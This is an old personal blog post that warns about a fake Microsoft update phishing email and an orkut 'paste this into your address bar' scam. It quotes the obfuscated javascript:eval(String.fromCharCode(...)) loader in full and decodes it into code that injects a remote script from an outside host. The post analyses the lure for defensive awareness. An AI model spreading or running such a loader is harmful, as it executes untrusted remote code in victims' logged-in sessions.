Nirenjan’s Space

I received a mail today purported to be from Microsoft updates. The mail was just this:

URGENT: Please intall critical Windows XP/2000/2003/Vista update!

Urgent Install Get critical update (obligatory)

Concerned about privacy? When you check for updates, basic information about your computer, not you, is used to determine which updates your programs need. To learn more, see our privacy statement.

Now, the only link present in the original e-mail was the “Get critical update (obligatory)” one. No link to the privacy statement. No link to a Microsoft Security Advisory, nothing. And that link was to another site designed to look exactly like the Microsoft Update website.

The scary thing is that this kind of e-mail is very effective. Most people who don’t have any clue of what is going on would just click on the button, resulting in an installation that would bring in viruses, Trojans, spyware, malware, etcetera, etcetera, etcetera.

That’s why there are a lot of warnings all over. Don’t click on any link in e-mail messages, even if you believe it to be true.

(Or better yet, use Linux)

Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”

The latest is a pretty interesting one…

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts it into their corresponding ASCII characters.

A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):

d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)


This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script at the site, I get the message: This site has been disabled for violations of our Program Policies. .

A quick google search for the script file name yielded that the script simply floods your friends scrapbooks with the same message. Apparently harmless. The key word is apparently.

Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.

I still don’t get it why people jump on scripts like this, when the orkut home page advertises (or at least used to) not to run any script when logged onto orkut. So, I’ll put out a simple security advisory.

Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.